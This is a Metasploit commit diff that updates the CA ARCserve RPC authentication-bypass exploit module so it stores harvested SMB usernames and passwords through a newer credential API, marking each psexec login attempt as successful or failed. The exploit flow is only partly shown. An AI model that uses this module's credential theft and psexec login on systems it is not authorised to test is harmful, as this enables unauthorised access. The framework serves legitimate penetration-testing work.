Land rapid7#5478, @wchen-r7 Updates ca_arcserve_rpc_authbypass to use the new cred API

jvazquez-r7 · jvazquez-r7 · commit 1c357e6b3cf0 · 2015-06-19T10:21:14.000-05:00
diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -58,6 +58,33 @@ def initialize(info = {})
       ], self.class )
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      private_data: opts[:password],
+      origin_type: :service,
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: opts[:status],
+      last_attempted_at: DateTime.now
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def exploit
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
 
@@ -104,18 +131,6 @@ def exploit
       pass = resp[pass_index+1].gsub(/\"/, "")
     end
 
-    # report the auth
-    auth = {
-        :host   => datastore['RHOST'],
-        :port   => 445,
-        :sname  => 'smb',
-        :proto  => 'tcp',
-        :user   => user,
-        :pass   => pass,
-        :active => true
-      }
-    report_auth_info(auth)
-
     srvc = {
         :host   => datastore['RHOST'],
         :port   => datastore['RPORT'],
@@ -159,11 +174,31 @@ def exploit
         'RunAsJob' => true
       )
     rescue
+      report_cred(
+        ip: datastore['RHOST'],
+        port: 445,
+        service_name: 'smb',
+        user: user,
+        password: pass,
+        status: Metasploit::Model::Login::Status::INCORRECT
+      )
+
       print_status("Login attempt using windows/smb/psexec failed")
       print_status("Credentials have been stored and may be useful for authentication against other services.")
+      # report the auth
       return
     end
 
+    # report the auth
+    report_cred(
+      ip: datastore['RHOST'],
+      port: 445,
+      service_name: 'smb',
+      user: user,
+      password: pass,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    )
+
     handler
   end
 end
